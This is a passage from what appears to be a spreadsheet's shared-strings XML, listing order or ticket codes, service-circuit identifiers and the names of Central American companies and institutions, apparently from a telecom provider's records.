    <t>ID1024240SV</t>
  </si>
  <si>
    <t>944700001T</t>
  </si>
  <si>
    <t>GRUPO DE TODOS,S.A.</t>
  </si>
  <si>
    <t>F4535974</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0421</t>
  </si>
  <si>
    <t>F4533874</t>
  </si>
  <si>
    <t>CONTR0002771957OC</t>
  </si>
  <si>
    <t>DHL CUSTOMS (COSTA RICA) S. A.</t>
  </si>
  <si>
    <t>826900011T</t>
  </si>
  <si>
    <t>F4529407</t>
  </si>
  <si>
    <t>F4529405</t>
  </si>
  <si>
    <t>F4529406</t>
  </si>
  <si>
    <t>245700220T</t>
  </si>
  <si>
    <t>F4529259</t>
  </si>
  <si>
    <t>F4529261</t>
  </si>
  <si>
    <t>F4529262</t>
  </si>
  <si>
    <t>CC_POLLO_CAMPERO_GT_INTERNET_C157</t>
  </si>
  <si>
    <t>F4529129</t>
  </si>
  <si>
    <t>F4528722</t>
  </si>
  <si>
    <t>F4532086</t>
  </si>
  <si>
    <t>F4534663</t>
  </si>
  <si>
    <t>F4536524</t>
  </si>
  <si>
    <t>F4536526</t>
  </si>
  <si>
    <t>680300001T</t>
  </si>
  <si>
    <t>CORPORACION DE SERVICIOS DE SALUD Y ESTETICA, S.A</t>
  </si>
  <si>
    <t>IP2099292SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SONSONATE</t>
  </si>
  <si>
    <t>8200074T</t>
  </si>
  <si>
    <t>F4532006</t>
  </si>
  <si>
    <t>678900001T</t>
  </si>
  <si>
    <t>MP230470005SSV</t>
  </si>
  <si>
    <t>SOLUCIONES LOGISTICAS DE CENTROAMERICA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4532231</t>
  </si>
  <si>
    <t>F4532230</t>
  </si>
  <si>
    <t>F4529542</t>
  </si>
  <si>
    <t>F4530678</t>
  </si>
  <si>
    <t>F4534705</t>
  </si>
  <si>
    <t>F4536745</t>
  </si>
  <si>
    <t>625900201T</t>
  </si>
  <si>
    <t>F4529388</t>
  </si>
  <si>
    <t>F4527962</t>
  </si>
  <si>
    <t>F4527961</t>
  </si>
  <si>
    <t>758500454T</t>
  </si>
  <si>
    <t>F4532532</t>
  </si>
  <si>
    <t>922000001T</t>
  </si>
  <si>
    <t>DACNIS, S.A.</t>
  </si>
  <si>
    <t>F4529548</t>
  </si>
  <si>
    <t>47503076T</t>
  </si>
  <si>
    <t>5271546ON</t>
  </si>
  <si>
    <t>F4533192</t>
  </si>
  <si>
    <t>F4533193</t>
  </si>
  <si>
    <t>758500304T</t>
  </si>
  <si>
    <t>F4537129</t>
  </si>
  <si>
    <t>F4537126</t>
  </si>
  <si>
    <t>IDG002602SV</t>
  </si>
  <si>
    <t>F4533965</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_3G_PLAZA_SAN_NICOLAS_KIOSKO1</t>
  </si>
  <si>
    <t>F4532224</t>
  </si>
  <si>
    <t>F4528436</t>
  </si>
  <si>
    <t>F4529480</t>
  </si>
  <si>
    <t>361700297T</t>
  </si>
  <si>
    <t>ID1071053SV</t>
  </si>
  <si>
    <t>FERREIRO,S.A DE C.V.</t>
  </si>
  <si>
    <t>F4536995</t>
  </si>
  <si>
    <t>F4536704</t>
  </si>
  <si>
    <t>F4531136</t>
  </si>
  <si>
    <t>F4536632</t>
  </si>
  <si>
    <t>7800535T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0304</t>
  </si>
  <si>
    <t>F4527096</t>
  </si>
  <si>
    <t>F4535058</t>
  </si>
  <si>
    <t>F4527310</t>
  </si>
  <si>
    <t>F4535543</t>
  </si>
  <si>
    <t>F4527456</t>
  </si>
  <si>
    <t>770600042T</t>
  </si>
  <si>
    <t>807900485T</t>
  </si>
  <si>
    <t>938400004T</t>
  </si>
  <si>
    <t>REPRESENTACION ALTO COMISIONADO NACIONES UNIDAS LOS REFUGIADOS (ACNUR)</t>
  </si>
  <si>
    <t>F4538178</t>
  </si>
  <si>
    <t>911100001T</t>
  </si>
  <si>
    <t>CETECH INTERNET HUITAN</t>
  </si>
  <si>
    <t>IPG003037SV</t>
  </si>
  <si>
    <t>F4529641</t>
  </si>
  <si>
    <t>F4533711</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4254</t>
  </si>
  <si>
    <t>769500001T</t>
  </si>
  <si>
    <t>PACER INTERNATIONAL CORPORATION GT</t>
  </si>
  <si>
    <t>1036969OH</t>
  </si>
  <si>
    <t>F4531478</t>
  </si>
  <si>
    <t>3575454ON</t>
  </si>
  <si>
    <t>F4536701</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_72</t>
  </si>
  <si>
    <t>F4530914</t>
  </si>
  <si>
    <t>F4538697</t>
  </si>
  <si>
    <t>F4528832</t>
  </si>
  <si>
    <t>931300001T</t>
  </si>
  <si>
    <t>LAFISE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4538376</t>
  </si>
  <si>
    <t>F4538530</t>
  </si>
  <si>
    <t>F4531499</t>
  </si>
  <si>
    <t>F4527726</t>
  </si>
  <si>
    <t>672100052T</t>
  </si>
  <si>
    <t>F4528342</t>
  </si>
  <si>
    <t>F4535511</t>
  </si>
  <si>
    <t>872200002T</t>
  </si>
  <si>
    <t>ELIGE TU DESTINO TRAVEL, S.A.</t>
  </si>
  <si>
    <t>90001907009T</t>
  </si>
  <si>
    <t>F4538459</t>
  </si>
  <si>
    <t>F4538460</t>
  </si>
  <si>
    <t>F4538075</t>
  </si>
  <si>
    <t>F4538616</t>
  </si>
  <si>
    <t>F4538467</t>
  </si>
  <si>
    <t>F4530797</t>
  </si>
  <si>
    <t>1354827OH</t>
  </si>
  <si>
    <t>1724426OH</t>
  </si>
  <si>
    <t>F4531490</t>
  </si>
  <si>
    <t>F4528896</t>
  </si>
  <si>
    <t>F4533235</t>
  </si>
  <si>
    <t>F4534726</t>
  </si>
  <si>
    <t>F4538623</t>
  </si>
  <si>
    <t>F4530800</t>
  </si>
  <si>
    <t>F4528692</t>
  </si>
  <si>
    <t>F4530682</t>
  </si>
  <si>
    <t>F4538626</t>
  </si>
  <si>
    <t>F4538788</t>
  </si>
  <si>
    <t>F4531494</t>
  </si>
  <si>
    <t>F4529739</t>
  </si>
  <si>
    <t>F4530030</t>
  </si>
  <si>
    <t>F4530946</t>
  </si>
  <si>
    <t>F4532534</t>
  </si>
  <si>
    <t>F4534725</t>
  </si>
  <si>
    <t>25245500SV</t>
  </si>
  <si>
    <t>SACOS SINTETICOS CENTROAMERICANOS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4536619</t>
  </si>
  <si>
    <t>F4536844</t>
  </si>
  <si>
    <t>F4538809</t>
  </si>
  <si>
    <t>F4538243</t>
  </si>
  <si>
    <t>F4529074</t>
  </si>
  <si>
    <t>327300011T</t>
  </si>
  <si>
    <t>F4531495</t>
  </si>
  <si>
    <t>F4528693</t>
  </si>
  <si>
    <t>F4531135</t>
  </si>
  <si>
    <t>F4532675</t>
  </si>
  <si>
    <t>90001902317T</t>
  </si>
  <si>
    <t>CORTINAS DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4535057</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0155</t>
  </si>
  <si>
    <t>F4538827</t>
  </si>
  <si>
    <t>F4538850</t>
  </si>
  <si>
    <t>8900795T</t>
  </si>
  <si>
    <t>F4538861</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0345</t>
  </si>
  <si>
    <t>F4538326</t>
  </si>
  <si>
    <t>F4532679</t>
  </si>
  <si>
    <t>1242509OH</t>
  </si>
  <si>
    <t>F4535342</t>
  </si>
  <si>
    <t>F4537370</t>
  </si>
  <si>
    <t>MP222801077SSV</t>
  </si>
  <si>
    <t>F4530871</t>
  </si>
  <si>
    <t>F4526953</t>
  </si>
  <si>
    <t>3363116ON</t>
  </si>
  <si>
    <t>F4532014</t>
  </si>
  <si>
    <t>IP2099298SV</t>
  </si>
  <si>
    <t>F4528402</t>
  </si>
  <si>
    <t>F4526611</t>
  </si>
  <si>
    <t>F4526613</t>
  </si>
  <si>
    <t>F4526548</t>
  </si>
  <si>
    <t>474000001T</t>
  </si>
  <si>
    <t>BUILDER S.A.</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0106</t>
  </si>
  <si>
    <t>F4536175</t>
  </si>
  <si>
    <t>F4537369</t>
  </si>
  <si>
    <t>23258125SV</t>
  </si>
  <si>
    <t>COSAVI DE R.L</t>
  </si>
  <si>
    <t>25102600SV</t>
  </si>
  <si>
    <t>NORTH ATLANTIC SA DE CV</t>
  </si>
  <si>
    <t>1137381OH</t>
  </si>
  <si>
    <t>F4526729</t>
  </si>
  <si>
    <t>F4527291</t>
  </si>
  <si>
    <t>F4533842</t>
  </si>
  <si>
    <t>F4534623</t>
  </si>
  <si>
    <t>IP2148047SV</t>
  </si>
  <si>
    <t>FAE DEL MIGOB.Y DES.TERRE.CBES</t>
  </si>
  <si>
    <t>F4535359</t>
  </si>
  <si>
    <t>F4536039</t>
  </si>
  <si>
    <t>F4536826</t>
  </si>
  <si>
    <t>426100023T</t>
  </si>
  <si>
    <t>F4529185</t>
  </si>
  <si>
    <t>F4526730</t>
  </si>
  <si>
    <t>F4530883</t>
  </si>
  <si>
    <t>406400089T</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_ZONA_2_TOTONICAPA</t>
  </si>
  <si>
    <t>F4532203</t>
  </si>
  <si>
    <t>F4532907</t>
  </si>
  <si>
    <t>F4534026</t>
  </si>
  <si>
    <t>F4538148</t>
  </si>
  <si>
    <t>F4538149</t>
  </si>
  <si>
    <t>F4538246</t>
  </si>
  <si>
    <t>F4526996</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_MERAKI_AGENCIA_137</t>
  </si>
  <si>
    <t>F4529060</t>
  </si>
  <si>
    <t>F4529534</t>
  </si>
  <si>
    <t>F4530694</t>
  </si>
  <si>
    <t>F4532204</t>
  </si>
  <si>
    <t>349900197T</t>
  </si>
  <si>
    <t>872600010T</t>
  </si>
  <si>
    <t>F4536040</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0020</t>
  </si>
  <si>
    <t>562250OH</t>
  </si>
  <si>
    <t>F4537167</t>
  </si>
  <si>
    <t>F4532294</t>
  </si>
  <si>
    <t>F4530695</t>
  </si>
  <si>
    <t>F4527990</t>
  </si>
  <si>
    <t>362900004T</t>
  </si>
  <si>
    <t>INVERSIONES INMOBILIARIAS Y COMERCIALES S.A.</t>
  </si>
  <si>
    <t>F4532198</t>
  </si>
  <si>
    <t>99900371T</t>
  </si>
  <si>
    <t>90001801187T</t>
  </si>
  <si>
    <t>F4534029</t>
  </si>
  <si>
    <t>F4534816</t>
  </si>
  <si>
    <t>F4536063</t>
  </si>
  <si>
    <t>90001908059T</t>
  </si>
  <si>
    <t>F4536309</t>
  </si>
  <si>
    <t>F4536535</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_CONCEPCION</t>
  </si>
  <si>
    <t>IDG000177SV</t>
  </si>
  <si>
    <t>F4538578</t>
  </si>
  <si>
    <t>334900019T</t>
  </si>
  <si>
    <t>928400002T</t>
  </si>
  <si>
    <t>LOQUI,SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4531441</t>
  </si>
  <si>
    <t>449629ON</t>
  </si>
  <si>
    <t>770600155T</t>
  </si>
  <si>
    <t>90001902858T</t>
  </si>
  <si>
    <t>4785146ON</t>
  </si>
  <si>
    <t>991072OH</t>
  </si>
  <si>
    <t>F4530215</t>
  </si>
  <si>
    <t>4907690ON</t>
  </si>
  <si>
    <t>F4531442</t>
  </si>
  <si>
    <t>F4531657</t>
  </si>
  <si>
    <t>425500050T</t>
  </si>
  <si>
    <t>2000003T</t>
  </si>
  <si>
    <t>DUWEST GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4535960</t>
  </si>
  <si>
    <t>F4536401</t>
  </si>
  <si>
    <t>F4537170</t>
  </si>
  <si>
    <t>F4530898</t>
  </si>
  <si>
    <t>781100005T</t>
  </si>
  <si>
    <t>F4530133</t>
  </si>
  <si>
    <t>F4532324</t>
  </si>
  <si>
    <t>F4533761</t>
  </si>
  <si>
    <t>F4535462</t>
  </si>
  <si>
    <t>F4536471</t>
  </si>
  <si>
    <t>IPG000078SV</t>
  </si>
  <si>
    <t>F4537495</t>
  </si>
  <si>
    <t>61200151T</t>
  </si>
  <si>
    <t>F4531443</t>
  </si>
  <si>
    <t>598700026T</t>
  </si>
  <si>
    <t>F4535314</t>
  </si>
  <si>
    <t>IP2099293SV</t>
  </si>
  <si>
    <t>249600029T</t>
  </si>
  <si>
    <t>F4536306</t>
  </si>
  <si>
    <t>F4537224</t>
  </si>
  <si>
    <t>F4537237</t>
  </si>
  <si>
    <t>F4530851</t>
  </si>
  <si>
    <t>F4530902</t>
  </si>
  <si>
    <t>REPRESENTACION ALTO COMISIONADO NACIONES UNIDAS LOS REFUGIADOS (ACNUR) GUATEMALA</t>
  </si>
  <si>
    <t>F4530636</t>
  </si>
  <si>
    <t>F4531746</t>
  </si>
  <si>
    <t>F4532467</t>
  </si>
  <si>
    <t>5535280ON</t>
  </si>
  <si>
    <t>MINISTERI DE EDUCACION</t>
  </si>
  <si>
    <t>450819ON</t>
  </si>
  <si>
    <t>F4537226</t>
  </si>
  <si>
    <t>F4537865</t>
  </si>
  <si>
    <t>F4530853</t>
  </si>
  <si>
    <t>F4530854</t>
  </si>
  <si>
    <t>F4528846</t>
  </si>
  <si>
    <t>22979800SV</t>
  </si>
  <si>
    <t>PRESTEGARD ELECTROS.A DE C.V.</t>
  </si>
  <si>
    <t>801700002T</t>
  </si>
  <si>
    <t>TECNISCAN</t>
  </si>
  <si>
    <t>ID1044034SV</t>
  </si>
  <si>
    <t>DIVECO EL SALVADOR S.A DE  CV</t>
  </si>
  <si>
    <t>F4533473</t>
  </si>
  <si>
    <t>MP230305057SSV</t>
  </si>
  <si>
    <t>F4535478</t>
  </si>
  <si>
    <t>F4536264</t>
  </si>
  <si>
    <t>F4537123</t>
  </si>
  <si>
    <t>F4528099</t>
  </si>
  <si>
    <t>F4534576</t>
  </si>
  <si>
    <t>678000016T</t>
  </si>
  <si>
    <t>362900002T</t>
  </si>
  <si>
    <t>F4528270</t>
  </si>
  <si>
    <t>F4532471</t>
  </si>
  <si>
    <t>F4533474</t>
  </si>
  <si>
    <t>F4534153</t>
  </si>
  <si>
    <t>25232222SV</t>
  </si>
  <si>
    <t>COMEBIEN S.A. DE C.V.</t>
  </si>
  <si>
    <t>CC_WALMART_SV_ROSARIO_DE_LA_PAZ</t>
  </si>
  <si>
    <t>F4531071</t>
  </si>
  <si>
    <t>F4529396</t>
  </si>
  <si>
    <t>F4530639</t>
  </si>
  <si>
    <t>265900384T</t>
  </si>
  <si>
    <t>F4533475</t>
  </si>
  <si>
    <t>F4536372</t>
  </si>
  <si>
    <t>F4530870</t>
  </si>
  <si>
    <t>F4532291</t>
  </si>
  <si>
    <t>F4527881</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_C164</t>
  </si>
  <si>
    <t>926600001T</t>
  </si>
  <si>
    <t>INVERSIONES ZACSA, S.A</t>
  </si>
  <si>
    <t>F4535267</t>
  </si>
  <si>
    <t>F4539295</t>
  </si>
  <si>
    <t>451936ON</t>
  </si>
  <si>
    <t>331000177T</t>
  </si>
  <si>
    <t>IP2136070SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE METAPAN</t>
  </si>
  <si>
    <t>F4539299</t>
  </si>
  <si>
    <t>FG9160G</t>
  </si>
  <si>
    <t>F4540509</t>
  </si>
  <si>
    <t>F4539298</t>
  </si>
  <si>
    <t>607100039T</t>
  </si>
  <si>
    <t>F4539292</t>
  </si>
  <si>
    <t>F4539852</t>
  </si>
  <si>
    <t>F4538765</t>
  </si>
  <si>
    <t>F4528878</t>
  </si>
  <si>
    <t>F4537154</t>
  </si>
  <si>
    <t>864600001T</t>
  </si>
  <si>
    <t>GLOBAL DENT S.A.</t>
  </si>
  <si>
    <t>F4531131</t>
  </si>
  <si>
    <t>F4538794</t>
  </si>
  <si>
    <t>F4536313</t>
  </si>
  <si>
    <t>478800019T</t>
  </si>
  <si>
    <t>F4530152</t>
  </si>
  <si>
    <t>F4530153</t>
  </si>
  <si>
    <t>F4532539</t>
  </si>
  <si>
    <t>F4532540</t>
  </si>
  <si>
    <t>1525978OH</t>
  </si>
  <si>
    <t>F4535920</t>
  </si>
  <si>
    <t>F4535921</t>
  </si>
  <si>
    <t>F4535923</t>
  </si>
  <si>
    <t>F4527145</t>
  </si>
  <si>
    <t>F4535015</t>
  </si>
  <si>
    <t>F4537412</t>
  </si>
  <si>
    <t>90001906298T</t>
  </si>
  <si>
    <t>26224400SV</t>
  </si>
  <si>
    <t>F4530687</t>
  </si>
  <si>
    <t>F4529499</t>
  </si>
  <si>
    <t>90001909667T</t>
  </si>
  <si>
    <t>1644954OH</t>
  </si>
  <si>
    <t>OH1001052850</t>
  </si>
  <si>
    <t>F4527397</t>
  </si>
  <si>
    <t>F4527399</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_SALA37</t>
  </si>
  <si>
    <t>F4527400</t>
  </si>
  <si>
    <t>F4527401</t>
  </si>
  <si>
    <t>F4527402</t>
  </si>
  <si>
    <t>F4527403</t>
  </si>
  <si>
    <t>F4532362</t>
  </si>
  <si>
    <t>F4535951</t>
  </si>
  <si>
    <t>913800001T</t>
  </si>
  <si>
    <t>ASOCIACION FLAAR MESOAMERICA</t>
  </si>
  <si>
    <t>3611750ON</t>
  </si>
  <si>
    <t>47502034T</t>
  </si>
  <si>
    <t>F4536304</t>
  </si>
  <si>
    <t>F4536601</t>
  </si>
  <si>
    <t>5322108ON</t>
  </si>
  <si>
    <t>F4528511</t>
  </si>
  <si>
    <t>F4528903</t>
  </si>
  <si>
    <t>F4529213</t>
  </si>
  <si>
    <t>F4532262</t>
  </si>
  <si>
    <t>1417022OH</t>
  </si>
  <si>
    <t>F4532260</t>
  </si>
  <si>
    <t>F4535673</t>
  </si>
  <si>
    <t>F4529537</t>
  </si>
  <si>
    <t>F4530205</t>
  </si>
  <si>
    <t>F4527376</t>
  </si>
  <si>
    <t>F4533757</t>
  </si>
  <si>
    <t>F4534817</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_TECULUTAN</t>
  </si>
  <si>
    <t>F4535710</t>
  </si>
  <si>
    <t>F4535709</t>
  </si>
  <si>
    <t>F4537277</t>
  </si>
  <si>
    <t>8200086T</t>
  </si>
  <si>
    <t>F4527613</t>
  </si>
  <si>
    <t>F4529367</t>
  </si>
  <si>
    <t>F4531963</t>
  </si>
  <si>
    <t>F4532356</t>
  </si>
  <si>
    <t>ID1045091SV</t>
  </si>
  <si>
    <t>F4536013</t>
  </si>
  <si>
    <t>356100003T</t>
  </si>
  <si>
    <t>DIRECCION GENERAL DE AERONAUTICA  CIVIL</t>
  </si>
  <si>
    <t>F4529337</t>
  </si>
  <si>
    <t>865000012T</t>
  </si>
  <si>
    <t>F4536762</t>
  </si>
  <si>
    <t>F4535916</t>
  </si>
  <si>
    <t>F4535917</t>
  </si>
  <si>
    <t>F4536511</t>
  </si>
  <si>
    <t>F4527762</t>
  </si>
  <si>
    <t>F4530194</t>
  </si>
  <si>
    <t>FG9166G</t>
  </si>
  <si>
    <t>F4540881</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0335</t>
  </si>
  <si>
    <t>F4540506</t>
  </si>
  <si>
    <t>F4539648</t>
  </si>
  <si>
    <t>IDG000191SV</t>
  </si>
  <si>
    <t>NEXSYS DE CENTROAMERICA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4539628</t>
  </si>
  <si>
    <t>IDG002601SV</t>
  </si>
  <si>
    <t>F4540815</t>
  </si>
  <si>
    <t>F4539217</t>
  </si>
  <si>
    <t>3611760ON</t>
  </si>
  <si>
    <t>F4546129</t>
  </si>
  <si>
    <t>F4546189</t>
  </si>
  <si>
    <t>F4541027</t>
  </si>
  <si>
    <t>90001801732T</t>
  </si>
  <si>
    <t>F4541438</t>
  </si>
  <si>
    <t>F4539595</t>
  </si>
  <si>
    <t>F4540916</t>
  </si>
  <si>
    <t>506844ON</t>
  </si>
  <si>
    <t>F4539995</t>
  </si>
  <si>
    <t>F4540955</t>
  </si>
  <si>
    <t>47503432T</t>
  </si>
  <si>
    <t>90001801618T</t>
  </si>
  <si>
    <t>90001909688T</t>
  </si>
  <si>
    <t>331000111T</t>
  </si>
  <si>
    <t>F4540813</t>
  </si>
  <si>
    <t>703700002T</t>
  </si>
  <si>
    <t>F4539483</t>
  </si>
  <si>
    <t>831300001T</t>
  </si>
  <si>
    <t>PRODUCTOS AVICOLAS, S.A.</t>
  </si>
  <si>
    <t>F4541441</t>
  </si>
  <si>
    <t>F4541278</t>
  </si>
  <si>
    <t>F4544655</t>
  </si>
  <si>
    <t>CONTR0002073170OC</t>
  </si>
  <si>
    <t>BANCO BAC SAN JOSE S.A.</t>
  </si>
  <si>
    <t>21335000SV</t>
  </si>
  <si>
    <t>F4544652</t>
  </si>
  <si>
    <t>5080618ON</t>
  </si>
  <si>
    <t>21337300SV</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_PATULUL_067</t>
  </si>
  <si>
    <t>F4542361</t>
  </si>
  <si>
    <t>F4542362</t>
  </si>
  <si>
    <t>F4544854</t>
  </si>
  <si>
    <t>F4544855</t>
  </si>
  <si>
    <t>265900403T</t>
  </si>
  <si>
    <t>F4544913</t>
  </si>
  <si>
    <t>F4543639</t>
  </si>
  <si>
    <t>F4543638</t>
  </si>
  <si>
    <t>5371505ON</t>
  </si>
  <si>
    <t>MECO</t>
  </si>
  <si>
    <t>F4542049</t>
  </si>
  <si>
    <t>1731080OH</t>
  </si>
  <si>
    <t>90001903046T</t>
  </si>
  <si>
    <t>F4541191</t>
  </si>
  <si>
    <t>F4541126</t>
  </si>
  <si>
    <t>F4541125</t>
  </si>
  <si>
    <t>F4545273</t>
  </si>
  <si>
    <t>F4545274</t>
  </si>
  <si>
    <t>F4545552</t>
  </si>
  <si>
    <t>F4545553</t>
  </si>
  <si>
    <t>F4545897</t>
  </si>
  <si>
    <t>F4545898</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_CUARTEL_PARAISO</t>
  </si>
  <si>
    <t>550100001T</t>
  </si>
  <si>
    <t>RECICLADOS DE GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4543037</t>
  </si>
  <si>
    <t>F4543034</t>
  </si>
  <si>
    <t>F4543038</t>
  </si>
  <si>
    <t>F4543039</t>
  </si>
  <si>
    <t>F4543040</t>
  </si>
  <si>
    <t>F4543042</t>
  </si>
  <si>
    <t>F4543043</t>
  </si>
  <si>
    <t>F4542619</t>
  </si>
  <si>
    <t>1386620OH</t>
  </si>
  <si>
    <t>70334OH</t>
  </si>
  <si>
    <t>F4545432</t>
  </si>
  <si>
    <t>449637ON</t>
  </si>
  <si>
    <t>F4544894</t>
  </si>
  <si>
    <t>F4539969</t>
  </si>
  <si>
    <t>F4539970</t>
  </si>
  <si>
    <t>F4539497</t>
  </si>
  <si>
    <t>265900393T</t>
  </si>
  <si>
    <t>F4544879</t>
  </si>
  <si>
    <t>F4544880</t>
  </si>
  <si>
    <t>F4544882</t>
  </si>
  <si>
    <t>F4545944</t>
  </si>
  <si>
    <t>897100001T</t>
  </si>
  <si>
    <t>SEGURIDAD Y VIGILANCIA EL EBANO S.A.</t>
  </si>
  <si>
    <t>518890OH</t>
  </si>
  <si>
    <t>8900712T</t>
  </si>
  <si>
    <t>F4542663</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_Z17_C.C.METRONORTE</t>
  </si>
  <si>
    <t>F4545902</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_RAMA_LA_TINTA</t>
  </si>
  <si>
    <t>863400011T</t>
  </si>
  <si>
    <t>90001900160T</t>
  </si>
  <si>
    <t>86100079T</t>
  </si>
  <si>
    <t>F4545568</t>
  </si>
  <si>
    <t>F4541015</t>
  </si>
  <si>
    <t>F4541017</t>
  </si>
  <si>
    <t>F4541018</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_0743</t>
  </si>
  <si>
    <t>8901237T</t>
  </si>
  <si>
    <t>F4540952</t>
  </si>
  <si>
    <t>625900198T</t>
  </si>
  <si>
    <t>3272444ON</t>
  </si>
  <si>
    <t>ON0000039764/CONSTRUCTORA MECO S.A CONSTRUCTORA MECO S.A</t>
  </si>
  <si>
    <t>F4541734</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_071</t>
  </si>
  <si>
    <t>F4544887</t>
  </si>
  <si>
    <t>F4545991</t>
  </si>
  <si>
    <t>F4546067</t>
  </si>
  <si>
    <t>F4541123</t>
  </si>
  <si>
    <t>F4541020</t>
  </si>
  <si>
    <t>939600002T</t>
  </si>
  <si>
    <t>MUNDITEC, S.A.</t>
  </si>
  <si>
    <t>1516636OH</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3084</t>
  </si>
  <si>
    <t>F4539780</t>
  </si>
  <si>
    <t>25114900SV</t>
  </si>
  <si>
    <t>CROWLEY TRANSPORTES EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>5610297ON</t>
  </si>
  <si>
    <t>90001900913T</t>
  </si>
  <si>
    <t>42700484T</t>
  </si>
  <si>
    <t>F4539227</t>
  </si>
  <si>
    <t>F4539657</t>
  </si>
  <si>
    <t>90001910673T</t>
  </si>
  <si>
    <t>535200050T</t>
  </si>
  <si>
    <t>5327857ON</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0431</t>
  </si>
  <si>
    <t>F4539480</t>
  </si>
  <si>
    <t>F4545535</t>
  </si>
  <si>
    <t>F4543173</t>
  </si>
  <si>
    <t>F4542439</t>
  </si>
  <si>
    <t>90001801338T</t>
  </si>
  <si>
    <t>628750OH</t>
  </si>
  <si>
    <t>OH1000581607/DISNA -</t>
  </si>
  <si>
    <t>IP2026296SV</t>
  </si>
  <si>
    <t>F4544525</t>
  </si>
  <si>
    <t>F4540096</t>
  </si>
  <si>
    <t>F4540064</t>
  </si>
  <si>
    <t>F4539445</t>
  </si>
  <si>
    <t>F4539484</t>
  </si>
  <si>
    <t>F4539877</t>
  </si>
  <si>
    <t>F4539506</t>
  </si>
  <si>
    <t>F4539461</t>
  </si>
  <si>
    <t>7900303T</t>
  </si>
  <si>
    <t>F4541099</t>
  </si>
  <si>
    <t>F4541001</t>
  </si>
  <si>
    <t>F4541100</t>
  </si>
  <si>
    <t>F4544996</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC005055</t>
  </si>
  <si>
    <t>F4544789</t>
  </si>
  <si>
    <t>ID1137017SV</t>
  </si>
  <si>
    <t>PUNTUAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4541101</t>
  </si>
  <si>
    <t>451392ON</t>
  </si>
  <si>
    <t>CONTR0001541960OC</t>
  </si>
  <si>
    <t>F4542342</t>
  </si>
  <si>
    <t>F4544992</t>
  </si>
  <si>
    <t>90001911155T</t>
  </si>
  <si>
    <t>910400080T</t>
  </si>
  <si>
    <t>IP2099181SV</t>
  </si>
  <si>
    <t>IP2137016SV</t>
  </si>
  <si>
    <t>F4544844</t>
  </si>
  <si>
    <t>F4539260</t>
  </si>
  <si>
    <t>910500001T</t>
  </si>
  <si>
    <t>CENTRO CLINICOPEDIATRICO S.A</t>
  </si>
  <si>
    <t>303100002T</t>
  </si>
  <si>
    <t>DROGUERIA ITALIANA S.A.</t>
  </si>
  <si>
    <t>1625493OH</t>
  </si>
  <si>
    <t>OH1001047015</t>
  </si>
  <si>
    <t>F4546094</t>
  </si>
  <si>
    <t>F4539109</t>
  </si>
  <si>
    <t>F4540957</t>
  </si>
  <si>
    <t>F4539637</t>
  </si>
  <si>
    <t>F4544750</t>
  </si>
  <si>
    <t>90001901071T</t>
  </si>
  <si>
    <t>821500001T</t>
  </si>
  <si>
    <t>ORIENTAL TOWN S.A.</t>
  </si>
  <si>
    <t>F4540195</t>
  </si>
  <si>
    <t>CC_WALMART_GT_INTERNET_TIENDA_4087</t>
  </si>
  <si>
    <t>90001908280T</t>
  </si>
  <si>
    <t>F4542291</t>
  </si>
  <si>
    <t>F4542241</t>
  </si>
  <si>
    <t>F4542242</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_FLORES_PETEN</t>
  </si>
  <si>
    <t>F4542226</t>
  </si>
  <si>
    <t>F4542118</t>
  </si>
  <si>
    <t>1664309OH</t>
  </si>
  <si>
    <t>F4544210</t>
  </si>
  <si>
    <t>F4544209</t>
  </si>
  <si>
    <t>1664592OH</t>
  </si>
  <si>
    <t>F4540307</t>
  </si>
  <si>
    <t>F4544033</t>
  </si>
  <si>
    <t>F4544030</t>
  </si>
  <si>
    <t>ID1028585SV</t>
  </si>
  <si>
    <t>7900173T</t>
  </si>
  <si>
    <t>F4544050</t>
  </si>
  <si>
    <t>F4544063</t>
  </si>
  <si>
    <t>F4544207</t>
  </si>
  <si>
    <t>90001908834T</t>
  </si>
  <si>
    <t>F4545115</t>
  </si>
  <si>
    <t>F4545116</t>
  </si>
  <si>
    <t>F4545137</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0177</t>
  </si>
  <si>
    <t>F4545139</t>
  </si>
  <si>
    <t>CONTR0002021456OC</t>
  </si>
  <si>
    <t>TE CONTACTO CONTACT CENTER S.A.</t>
  </si>
  <si>
    <t>F4542777</t>
